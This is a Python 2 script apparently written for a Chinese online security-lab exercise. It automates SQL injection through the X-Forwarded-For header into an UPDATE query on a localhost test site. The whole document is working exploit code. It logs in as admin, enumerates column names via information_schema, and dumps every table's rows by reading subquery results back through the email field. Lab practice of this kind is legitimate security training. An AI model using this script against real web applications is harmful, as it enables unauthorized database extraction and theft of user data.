参考实验:http://www.hetianlab.com/expc.do?ce=572fa9e9-7eb1-4928-bfe3-eaa444eab1e0
sqlupdateattack.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
import HTMLParser
import urlparse
import urllib
import urllib2
import cookielib
import string
import binascii
import re
import time
#截取字符串中startStr,endStr中间的值
def GetMiddleStr(content,startStr,endStr):
patternStr = r'%s(.+?)%s'%(startStr,endStr)
p = re.compile(patternStr,re.S)
m= re.search(p,content)
if m:
return m.group(1)
#跑表数量
def count(table_name,mode):
if mode==0:
tn16=binascii.b2a_hex(table_name.encode("utf8"))
sql_count='1.1.1.1\',email=(select count(COLUMN_NAME) from information_schema.columns where table_name=0x'+tn16+' and table_schema=database()) where username=\'admin\'#'
else:
if table_name=='testuser':
sql_count='1.1.1.1\',email=(select count(*) from ( select * from testuser) as x) where username=\'admin\'#'
else:
sql_count='1.1.1.1\',email=(select count(*) from '+table_name+') where username=\'admin\'#'
return sql_count
#跑表的列名用到的sql注入语句
def sql_column(table_name,num):
tn16=binascii.b2a_hex(table_name.encode("utf8"))
sql_column='1.1.1.1\',email=(select COLUMN_NAME from information_schema.columns where table_name=0x'+tn16+' limit '+str(num)+',1 ) where username=\'admin\'#'
return sql_column
#跑表的内容
def sql_data(table_name,column,num):
sql_data='1.1.1.1\',email=(select '+column+' from '+table_name+' order by id limit '+str(num)+',1) where username=\'admin\'#'
return sql_data
#跑表的内容(与update所用表(即演示中的testuser表)冲突使用)
def sql_users(column,num):
sql_users='1.1.1.1\',email=(select '+column+' from ( select * from testuser) as x order by ID limit '+str(num)+',1) where username=\'admin\'#'
return sql_users
#注入,先模拟登陆后截取结果并写入文件
def inject(posturl,sql):
try:
cookieJar=cookielib.CookieJar()
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookieJar))
headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04',
'X-Forwarded-For' : sql}
postData = {'uname' : 'admin',
'passwd' : 'admin',
'submit' : 'Submit' }
postData = urllib.urlencode(postData)
request = urllib2.Request(posturl, postData, headers)
result = opener.open(request)
str=result.read()
m=GetMiddleStr(str,'your email is:','</font><br>')
return m
except Exception,err:
err = 'weberror'
raise Exception(err)
if __name__ == '__main__':
posturl = 'http://127.0.0.1/test/index.php'
table_name=['testuser', 'test1']
#先跑表的各字段名,并存放到临时的column_name中
column_name=[]
for table in table_name:
sql_count=inject(posturl,count(table,0))
print table+":\r\n"
for num in range(int(sql_count)):
sql=sql_column(table,num)
try:
m=inject(posturl,sql)
column_name.append(m)
except TypeError:
print 'error'
print column_name
#跑对应的数据
for column in column_name:
print table+"|||"+column+":"
for num in range(int(inject(posturl,count(table,1)))):
if table=='testuser':
sql=sql_users(column,num)
else:
sql=sql_data(table,column,num)
m=inject(posturl,sql)
print m
print "\n"
